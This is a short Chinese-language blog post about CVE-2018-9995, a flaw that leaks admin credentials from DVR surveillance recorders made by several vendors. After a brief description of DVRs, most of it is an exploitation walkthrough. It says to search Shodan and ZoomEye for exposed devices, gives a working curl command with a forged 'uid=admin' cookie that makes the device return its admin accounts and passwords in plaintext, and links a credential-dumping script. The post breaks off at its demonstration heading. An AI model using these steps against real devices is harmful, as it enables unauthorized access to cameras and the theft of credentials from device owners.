漏洞编号:CVE-2018-9995
发现时间:2018-4
影响范围:tbk、NovoCeNova、QSee、Pulnix、XVR 5 in 1、Securus、Night OWL
漏洞描述:
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一大堆设备的功能。
最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。并且在GitHub发布了相关验证说明。
最开始研究员发现CVE-2018-9995仅影响由TBK制造的DVR设备,但接下来发现,由其他供应商的产品同样受到影响,包括但不限于:Novo、cenova、qseepulnix、night owl。
漏洞利用:
(因为笔者第一次写类似这种博客类东西,所以可能会有不完善的地方,尽量描述清楚)
1. 首先要确定目标。这里提供几个搜索引擎,国内的zoomeye、国外的shodan、以及谷歌(需要翻墙),按照关键字搜索都可以,相比较而言,笔者觉得可能shodan更好用,这里就以shodan和谷歌为例,搜索关键字如下:
2. 通过构造的链接命令查看是否DVR有返回消息
root# curl "http://ip:port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" && echo ""
如有返回消息,则可以直接得到登录账号密码。
3.通过脚本的方式获取账号密码
该脚本在原作者的GitHub上有,笔者也分享给大家:https://github.com/ezelf/CVE-2018-9995_dvr_credentials#help
4. 效果展示